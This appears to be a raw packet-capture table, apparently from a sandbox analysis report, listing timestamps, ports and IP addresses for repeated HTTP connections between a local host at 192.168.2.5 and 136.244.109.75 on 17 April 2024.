Apr 17, 2024 03:18:14.573266029 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573302984 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573313951 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.573313951 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.573348045 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573401928 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.573402882 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.703809977 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.781249046 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.781313896 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.781537056 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.781537056 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.907332897 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.910238981 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.912121058 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:15.116549015 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:15.116725922 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:15.320142031 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038089991 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038153887 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038192034 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038228035 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038270950 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038275957 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.038275957 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.038310051 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038347960 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038366079 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.038367033 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.038367033 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.038386106 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038398981 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.038424969 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038454056 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.038465977 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.038470030 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.038511038 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.172687054 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.241760969 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.241827011 CEST	80	49768	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.241961002 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.241961002 CEST	49768	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.376343966 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.376461029 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.378463030 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.583177090 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:16.583364010 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:16.786865950 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517573118 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517642021 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517679930 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517716885 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517760038 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517796993 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517826080 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.517834902 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517826080 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.517826080 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.517826080 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.517875910 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517915010 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517924070 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.517925024 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.517925024 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.517956018 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.517961025 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.517999887 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.657536983 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.721194983 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.721241951 CEST	80	49769	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.721441984 CEST	49769	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.865716934 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:17.865855932 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:17.867641926 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:18.075704098 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:18.075788021 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:18.284312963 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.005958080 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006020069 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006059885 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006100893 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006145954 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006184101 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006222010 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006259918 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006299019 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006326914 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.006328106 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.006328106 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.006328106 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.006341934 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.006328106 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.006328106 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.006328106 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.006450891 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.006450891 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.138796091 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.214519024 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.214587927 CEST	80	49770	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.214617014 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.214719057 CEST	49770	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.347254038 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.347469091 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.349313974 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.557409048 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:19.557465076 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:19.765561104 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481523037 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481553078 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481570959 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481589079 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481614113 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.481622934 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481642962 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481662035 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481678963 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481679916 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.481679916 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.481697083 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481708050 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.481708050 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.481714964 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.481733084 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.481733084 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.481750011 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.625178099 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.690243006 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.690279007 CEST	80	49771	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.690325975 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.690325975 CEST	49771	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.833164930 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:20.833437920 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:20.835118055 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:21.042851925 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:21.043060064 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:21.251286983 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013158083 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013219118 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013257027 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013293028 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013334036 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013356924 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.013356924 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.013370991 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013408899 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013438940 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.013438940 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.013438940 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.013452053 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013465881 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.013490915 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013497114 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.013531923 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.013531923 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.013597012 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.157819986 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.221482038 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.221546888 CEST	80	49772	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.221761942 CEST	49772	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.365911961 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.366019964 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.368817091 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.576766014 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:22.576855898 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:22.784889936 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493002892 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493066072 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493103981 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493134975 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.493139029 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493177891 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493205070 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.493205070 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.493216038 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493257999 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493273020 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.493273020 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.493299007 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493335962 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493344069 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.493344069 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.493380070 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.493424892 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.493424892 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.632786989 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.701389074 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.701455116 CEST	80	49773	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.701643944 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.701644897 CEST	49773	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.840939045 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:23.841322899 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:23.842884064 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:24.052639961 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:24.052902937 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:24.260787964 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006131887 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006189108 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006228924 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006270885 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006320000 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006360054 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006383896 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.006385088 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.006385088 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.006385088 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.006403923 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006448984 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006475925 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.006475925 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.006489038 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006504059 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.006530046 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.006546021 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.006587029 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.139903069 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.214441061 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.214504004 CEST	80	49774	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.214580059 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.214580059 CEST	49774	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.349011898 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.349263906 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.351054907 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.563133001 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:25.563291073 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:25.771167040 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477631092 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477698088 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477735996 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477756023 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477781057 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477801085 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477822065 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477855921 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477894068 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477981091 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:26.477993011 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.477981091 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:26.478039026 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:26.478050947 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:26.607635975 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:26.685874939 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.685939074 CEST	80	49775	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.686008930 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:26.686028004 CEST	49775	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:26.811841011 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:26.811934948 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:26.814059019 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.018100023 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.018201113 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.222240925 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.961832047 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.961890936 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.961930990 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.961963892 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.961971045 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.962007046 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.962012053 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.962018967 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.962052107 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.962055922 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.962094069 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.962101936 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.962136030 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.962138891 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.962174892 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.962179899 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.962215900 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:27.962218046 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:27.962259054 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:28.103007078 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:28.166500092 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:28.166568995 CEST	80	49776	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:28.166582108 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:28.166769028 CEST	49776	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:28.311539888 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:28.311799049 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:28.314688921 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:28.523348093 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:28.523677111 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:28.731425047 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.480891943 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.480922937 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.480966091 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.480983973 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.481005907 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.481024981 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.481045008 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.481065035 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.481082916 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.481102943 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.481153965 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.481153965 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.481153965 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.481154919 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.481154919 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.481154919 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.481154919 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.637538910 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.689371109 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.689435959 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.689471006 CEST	80	49777	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.689765930 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.689766884 CEST	49777	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.845937967 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:29.846147060 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:29.847908020 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:30.056802988 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:30.056888103 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:30.265464067 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046307087 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046369076 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046410084 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046449900 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046463013 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.046493053 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046500921 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.046533108 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046539068 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.046551943 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.046575069 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.046574116 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046611071 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046614885 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.046648979 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046658039 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.046685934 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.046689034 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.046731949 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.187762022 CEST	49779	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.254770994 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.254834890 CEST	80	49778	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:31.254841089 CEST	49778	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:31.254883051 CEST	49778	80	192.168.2.5	136.244.109.75
